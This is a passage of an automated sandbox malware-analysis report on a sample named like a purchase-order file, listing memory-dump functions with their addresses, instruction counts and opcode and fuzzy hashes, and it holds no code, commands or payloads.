Instruction Fuzzy Hash: C1014074D083499FDB04CFA9C8417ADFFF2BB4A314F148299D819A3261D7305986DF51

Function 05CAFAD0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c64f3e9f10e63fec1053cd06181178e5706b954d1118dbbe0801f09778260a
Instruction ID: e77b4a5fa3674e09dff40354207b911d38282a622326fea2670f8ef6096f768d
Opcode Fuzzy Hash: d6c64f3e9f10e63fec1053cd06181178e5706b954d1118dbbe0801f09778260a
Instruction Fuzzy Hash: 8E012836E00609DFCB40DFA9E54499EBBB5FF89711B108569E519A3310EB70AA04CFA5

Function 05B1B0D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b603a96ca239f0a4a9be4a11414a2f08321cec634398cbc69b0d25fa3a863c26
Instruction ID: 33afe9e1af246001de14b5f08c6c40cf5a3117608ff119963adc70eee393be15
Opcode Fuzzy Hash: b603a96ca239f0a4a9be4a11414a2f08321cec634398cbc69b0d25fa3a863c26
Instruction Fuzzy Hash: B9016D353006109FC309AB65D059A5ABBE6EFCC711B108529ED0A8B394CF32EC02CBD4

Function 05843D11 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f5171e349f67cc46ec0f2965c50b1f8ee96b12059dd94c6b0fa93ca20a13b92
Instruction ID: f1e3a714275699fc43168f638d5921ed3dcfa325692ac99ac8155b2491a1df1d
Opcode Fuzzy Hash: 8f5171e349f67cc46ec0f2965c50b1f8ee96b12059dd94c6b0fa93ca20a13b92
Instruction Fuzzy Hash: 9A012870D0520CEFDB40DFA8D8412ADBBF5AB08201F5045AA9819E3254EB314E40DF91

Function 0584D9AB Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d770ebf84ec50c9bf762742eefa28feec47636e420ed16a2f2010c1d793a56ff
Instruction ID: 043cec10a4037606c396d9979b774314ef2407744b85243d5beea8aa9757a450
Opcode Fuzzy Hash: d770ebf84ec50c9bf762742eefa28feec47636e420ed16a2f2010c1d793a56ff
Instruction Fuzzy Hash: 32F09632F053155FE3149655D40476AFBA5EBC9324F14402AED4EDF351DA72EC428B94

Function 0584DA10 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a73cf0327c66bd055554c8ab2d8d1948d9d6702d3cb59aea323c42019c0c9725
Instruction ID: 3be7c4804529e036346afba8372c7a84c7711f43746fee3bef296aaf73b0eee7
Opcode Fuzzy Hash: a73cf0327c66bd055554c8ab2d8d1948d9d6702d3cb59aea323c42019c0c9725
Instruction Fuzzy Hash: 38F02462F0E2954FE32243345811329BFE29BC6104F1884DBDCCBCF2A2D996DC068751

Function 0584D9B8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a0343679f882776a5814254b83977f7453280d29ae8176c521268f9ecf9d1c
Instruction ID: d1845292a0e0aa65ba2c78df9fbe269e1778b81e2dcf72f7707de0187d8d3097
Opcode Fuzzy Hash: 06a0343679f882776a5814254b83977f7453280d29ae8176c521268f9ecf9d1c
Instruction Fuzzy Hash: 7CF0B431F052195FE32496199804B2EFBE9EBC8620F14802AED4ADB351CA62EC4287C4

Function 05B1A238 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8876ff5dc7033602b8da188195d38ab4de0458c0e56a11e39516503ecf1ec8
Instruction ID: b04630dc9a5a8d4db24e0de91bd23a3559de658f7401c04e5af04075526c392f
Opcode Fuzzy Hash: 4b8876ff5dc7033602b8da188195d38ab4de0458c0e56a11e39516503ecf1ec8
Instruction Fuzzy Hash: 1AF0A4316007045BE720CB15EC80F86BF9DEB80311F00862AF9554F655DAB0B90D8751

Function 05B0B4E3 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0da7c995749eabbe581d8c14b94910db338c3204d41bcee86838eaeb9ade95a2
Instruction ID: 86a9d6acb248e1154e8f3671cb53d7cecdb9028ebef740401a765b152913c256
Opcode Fuzzy Hash: 0da7c995749eabbe581d8c14b94910db338c3204d41bcee86838eaeb9ade95a2
Instruction Fuzzy Hash: 6511B074A55229CFDF60DF14D890FADBBB2BB4A300F0054E9D50AA7281DB31AE85DF45

Function 05B0C244 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0761dfe8733096d93eb5ec95723e009d06da6617f31315df5d238435c46f158
Instruction ID: ea14f4c6e0380d35898645862ed87356a40f6c99035163962e9f134d42ed7790
Opcode Fuzzy Hash: f0761dfe8733096d93eb5ec95723e009d06da6617f31315df5d238435c46f158
Instruction Fuzzy Hash: 9601D071901218DFDB60CF54CD80FD9BBB9FB08304F1085E5E249A7290C771AA89CF10

Function 05B0BD89 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 999b6759145d85112fd837d9ddc901d76217f46dca793730c4ed888d38d93485
Instruction ID: 663b6942f5fcdc485cf7ce576982c27176d06a3fb037b47c617166331e234941
Opcode Fuzzy Hash: 999b6759145d85112fd837d9ddc901d76217f46dca793730c4ed888d38d93485
Instruction Fuzzy Hash: 4E01FB76D0021ADBCF01DF98C801AEDFB75FF48310F04961AE99563250D735A552DF90

Function 05B05197 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dce99054c3a2e222676240a3d1299f1d5237a9d79b6999a3961a16b15f5981c
Instruction ID: 0c9e12ff47966511710e8c92f544a7c9f412e1ec9305af677d6524850f129f51
Opcode Fuzzy Hash: 3dce99054c3a2e222676240a3d1299f1d5237a9d79b6999a3961a16b15f5981c
Instruction Fuzzy Hash: 1B010430905228CFDF24CF15D988B99BBB6FB85301F0090E5DA0AA72A4CB306E85DF01

Function 05B1AE48 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621061cc85e577b3128872f79820e9d3d2b3a7bbc6fa6756b1b21ea6a35f4cb4
Instruction ID: 13e4f1db322f251ebb91ae2fa9f7cd470a7e47a901fdd89016503a4f1969b89f
Opcode Fuzzy Hash: 621061cc85e577b3128872f79820e9d3d2b3a7bbc6fa6756b1b21ea6a35f4cb4
Instruction Fuzzy Hash: 6AF0307A3507008FC705DF14D855E2A7BB6EF98721F0485A9E9478B362CA39EC42CB54

Function 05B0BD98 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18ae38b2bf978f823b6b6dea89f21d9e32d5da9a64220a0f0c915036c1a4e250
Instruction ID: ba448710c1721498aa2c3f9c2759035f6046d636b4262d8f57a4a527dbb878c7
Opcode Fuzzy Hash: 18ae38b2bf978f823b6b6dea89f21d9e32d5da9a64220a0f0c915036c1a4e250
Instruction Fuzzy Hash: E3F0E73180021AEBCF01DF99D8019EEFB75FF89320F00C659EA5967251D735A5A6DFA0

Function 05B08B79 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46fdd879183d3fae697c025b1374ce9fee9795b06d4a5ff7f607a6042662315a
Instruction ID: 5a8a9e28b58048e21f34a731e32f93c9717bddc5134a9fc2a78178ce89cc46d5
Opcode Fuzzy Hash: 46fdd879183d3fae697c025b1374ce9fee9795b06d4a5ff7f607a6042662315a
Instruction Fuzzy Hash: EBF0F9B0E45248CFDB14EFA6D540A6DBFF2EF85300F25A069E005AB295DB35A946CF00

Function 05B1AE58 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7675151c3d39f7256b2572c28631af5e52a4418424d1ddee215fb2139567891e
Instruction ID: abfbf1c4e1b3ba1eca73a6fe9293bd6dee1f465532ac0717c7e2519197336cb2
Opcode Fuzzy Hash: 7675151c3d39f7256b2572c28631af5e52a4418424d1ddee215fb2139567891e
Instruction Fuzzy Hash: 78F0FE353517009FC714DB19D854E2A77AAEFC9721B1580A9FA478B360CE71EC42CB94

Function 05B17AA1 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f5045a012bec8cc94850ec7d100852da9c64426932ee62f705e5938303ec643
Instruction ID: bd794619a02e2de25ea8ad265f9683d9ccbc9e23bb7bc415fd7999b8283dab71
Opcode Fuzzy Hash: 3f5045a012bec8cc94850ec7d100852da9c64426932ee62f705e5938303ec643
Instruction Fuzzy Hash: 48F0E93A7001059BCB45CB1CD599E6AB3F6EF84365F18806AD91ACB362DF30DC16DB84

Function 05B0D4F8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0060fbfa4ca5b72c15b403e58986756e49ee6e567079aa532265fe3e158c973c
Instruction ID: 9fd949a25876d12b47ad64448d90b84de726e86c7f1080473d8052ff06b0c8a4
Opcode Fuzzy Hash: 0060fbfa4ca5b72c15b403e58986756e49ee6e567079aa532265fe3e158c973c
Instruction Fuzzy Hash: BFF03075904248AFCB01CFD4C940A9DBFB6EF0A314F1491CAED59932A1D7319E51DF51

Function 05B098FB Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cb84e8a0bb0465a42b5b9260e1f3cebc96a319e7083b8db61c76178f5fe6151
Instruction ID: deebb7fe54658747367b8e3018b1946fedffeeaa7c1697c3c2fac9b2b9b7a328
Opcode Fuzzy Hash: 3cb84e8a0bb0465a42b5b9260e1f3cebc96a319e7083b8db61c76178f5fe6151
Instruction Fuzzy Hash: C8011674A01219CFDB64EF68D984FADBBB2FB48300F20916AD408A3395CB306C45DF40

Function 05B0501A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c43fbe53f3f1383bd8163b5ade302c8e93959abf9c904e986b87f78b6d8c36
Instruction ID: 8c90bef2ae1670f549abd85c860b8956ec232987eac76479b8f518380a3888d9
Opcode Fuzzy Hash: c2c43fbe53f3f1383bd8163b5ade302c8e93959abf9c904e986b87f78b6d8c36
Instruction Fuzzy Hash: F60146709053548FDB60CF29D899B9DBBB6FF45301F0191E6E909A72A5CB306E85CF01

Function 05C91028 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12cea589bdce96e4ea074667f776edb4c6c3e6dbe48afe73be57f59717b1b0db
Instruction ID: 7538275fd67d8fb474ce387d6dbe3af9da154d33165be00c5bbe27011c416fe1
Opcode Fuzzy Hash: 12cea589bdce96e4ea074667f776edb4c6c3e6dbe48afe73be57f59717b1b0db
Instruction Fuzzy Hash: E3010C74B06129CFCB64DF68CC889C9B7B1EB4A300F1185EAE419A77A4C6349EC1CF01

Function 00D242A1 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0cb75c28c08847f5c41e7aab4d4c2ae9f142e2320afbac0a56eaede5ccb2f8f
Instruction ID: 738b90df6a36adb11981d98e424ac27a1dc114b5baad87c9990d698d5b01f540
Opcode Fuzzy Hash: c0cb75c28c08847f5c41e7aab4d4c2ae9f142e2320afbac0a56eaede5ccb2f8f
Instruction Fuzzy Hash: E601AE7485426ADFEB24CF65DC48BECBBB4AB59308F0084EAE419A2294DB304A81CF11

Function 0584ACCC Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aaabbe97abedab35f8acbc89ef4e4abdf2c52ab39944b4a4114337a5194bc6c
Instruction ID: 2ff70fc27b8542d665af59962222fce3aedc10b394cc700d1df43fc879d6ff27
Opcode Fuzzy Hash: 1aaabbe97abedab35f8acbc89ef4e4abdf2c52ab39944b4a4114337a5194bc6c
Instruction Fuzzy Hash: CF013C74A001188FDB55DF58E48579DBBF1EB05304F1085A9E94ABB395CF319D8ADF04

Function 05843424 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807fdcb9056f011d7b14f80fdb87ae4f4226cd9b743d79f0f007d6601295936a
Instruction ID: 5686d5177b818671bed05e61c07b3ad150bfc98e15e3d0cd9b63970b5fe17a9f
Opcode Fuzzy Hash: 807fdcb9056f011d7b14f80fdb87ae4f4226cd9b743d79f0f007d6601295936a
Instruction Fuzzy Hash: 7A01C074D0020CCFEB01DFA9E498BACBBF1BB08315F4084A6E819E7254DB749989DF00

Function 0584B0C9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0292bc5169e2f009fb105d0d8b482163fd58de9abe114559cce99a162d21814e
Instruction ID: 87ad70cc3588af34f578bac668226dc066c6b9d7bc778432ea0bc722a282ab60
Opcode Fuzzy Hash: 0292bc5169e2f009fb105d0d8b482163fd58de9abe114559cce99a162d21814e
Instruction Fuzzy Hash: 72012474906248DFCB54DF18D889BADBBB1EF01305F1040AAE849EB391CB35AD89CF01

Function 05B050FD Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3ba9249a8892616aa54e60ecc3204434866150bfccb440579ee6948fb0c2cbe
Instruction ID: 57158c774130256fb92243305d47302dd1cee9cf72c19c409fcaa768511621cc
Opcode Fuzzy Hash: b3ba9249a8892616aa54e60ecc3204434866150bfccb440579ee6948fb0c2cbe
Instruction Fuzzy Hash: 7501C474A11229CFDB60DF28D895FA8B7F1FB08300F5081E5D549E7255DB71AE85AF00

Function 05844200 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099ee6a9ece7d8cfba9a70791b7c0b04c04023c0abb412409c0a03952e98697f
Instruction ID: dd83268ebf8730ef4396eb99ee2202db49b649f19995d462e64dbdbfdd4b7e70
Opcode Fuzzy Hash: 099ee6a9ece7d8cfba9a70791b7c0b04c04023c0abb412409c0a03952e98697f
Instruction Fuzzy Hash: BBF09A70D08248AFCB48DFA9D408A98BBF4BF06304F1081DAEC54D73A2D6309D41DF51

Function 05B0C930 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1460d2b6e0c39a00e6d553b0a0f9fd26ed546742198db688ebf2e2337e750d20
Instruction ID: e79a831820dc7620eca57d744da721d7d0353cce5a84a7a396a04480c4e6227e
Opcode Fuzzy Hash: 1460d2b6e0c39a00e6d553b0a0f9fd26ed546742198db688ebf2e2337e750d20
Instruction Fuzzy Hash: BBF0F875944149ABCB01CF94C900AACBBB1EB59341F149299A92996391C6369E52EF40

Function 05B17309 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2aa877489e06f4b995212288428db612afd02fe9836a97a3bf373c34e1cab26
Instruction ID: 5775a339fe2e2ddf0457b255a33198e4ac82ed21035f650c3ec96e872ddb5ac3
Opcode Fuzzy Hash: d2aa877489e06f4b995212288428db612afd02fe9836a97a3bf373c34e1cab26
Instruction Fuzzy Hash: A5E065316013155BD7109B16F885A4AFF6AEBC0361B00C939E4194B515DF70AD0B8BD4

Function 05B02428 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba42aafe2e115a36864aa4e09481f24761ba538daa5926f8a17f3b8c9923290
Instruction ID: 9f444cadf8d169a18f5f2c397f7384c0be833c6625dd753217752a2ecba78724
Opcode Fuzzy Hash: 9ba42aafe2e115a36864aa4e09481f24761ba538daa5926f8a17f3b8c9923290
Instruction Fuzzy Hash: 52E0D835509108ABC704CFD4DC427ACFBB8E746301F5091E9CD4967381CA316D07CB45

Function 05B0D468 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6e7759ebd4cbf94093e098d7b0fdaaa60c9a5660dc7551c8ff47a436629e3f6
Instruction ID: 597023a986436e034513d54575d460233e39ce650ed551f442a0e9aa805294b2
Opcode Fuzzy Hash: c6e7759ebd4cbf94093e098d7b0fdaaa60c9a5660dc7551c8ff47a436629e3f6
Instruction Fuzzy Hash: 35F030B5905108AFC740CFD4C941BACFBB5EB59311F1491DA981997391DA31AE42DE50

Function 05B053BA Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d95c142f93e581cc0707c410e6ac98b284197fdc0145155d788c4eb8552c3a3
Instruction ID: 95602e9ddbd6c7e7d789b0ddff8da85b7934ea7ead638c01773b274110d6c8e9
Opcode Fuzzy Hash: 6d95c142f93e581cc0707c410e6ac98b284197fdc0145155d788c4eb8552c3a3
Instruction Fuzzy Hash: 1B01B630906215CFDF20DF64D548BADBBB2FB45301F0490EAD545A62D4CB746A84DF11

Function 0584A8A5 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba510574ecef0ef97f6f9feb7cd25cd497203b428df978334295c83205d5acdd
Instruction ID: eeee66d78d1881533174858503aa0fefa0203b1eb8c22c3059ad486caf151856
Opcode Fuzzy Hash: ba510574ecef0ef97f6f9feb7cd25cd497203b428df978334295c83205d5acdd
Instruction Fuzzy Hash: 41F03770900218CFCB18DF58E486BE97BF2FB49301F5041A9E909A7281CB706E84CF50

Function 0584AAA1 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb9b62aa9e1e99d960e1cf730b1ebb508c23a6c6ee1a3b0084b944c7c981fdc
Instruction ID: 449b579051f39b531585313a53b6fe9a86c57906a018c6c77633b3939eaea4db
Opcode Fuzzy Hash: 1cb9b62aa9e1e99d960e1cf730b1ebb508c23a6c6ee1a3b0084b944c7c981fdc
Instruction Fuzzy Hash: C0F0E2749542188FCB18DF59E48ABAEBBB2FB05301F0080A9ED05A7391CB306D86CF45

Function 05B05C3D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d087f7dd57e527b07e32603ee6cfd1ec25b82ee0df68b07453f98a349c0f88
Instruction ID: 1beaf2e96ee11555bee9a1be39417e758bb530f97b4c215b0697979a43eb5993
Opcode Fuzzy Hash: 75d087f7dd57e527b07e32603ee6cfd1ec25b82ee0df68b07453f98a349c0f88
Instruction Fuzzy Hash: A0F03270906228CFDF30CF14D988BED7BB2FB46301F0460E6D288A6294CB346A85DF11

Function 05B00C50 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92e2b5524f2a08a580e5a47994e7f997a5cab1563a660ff0515c23eb06acd104
Instruction ID: c1ef785d081257040f280dbe24d0b4bea2c5ec9e6a2e2276f7553c1c1ec4d501
Opcode Fuzzy Hash: 92e2b5524f2a08a580e5a47994e7f997a5cab1563a660ff0515c23eb06acd104
Instruction Fuzzy Hash: 17E0923040920CA7C710DBA4D9457ACBBF9EB42315F54D1D99D4A97381C7315D42CB41

Function 05B037C8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

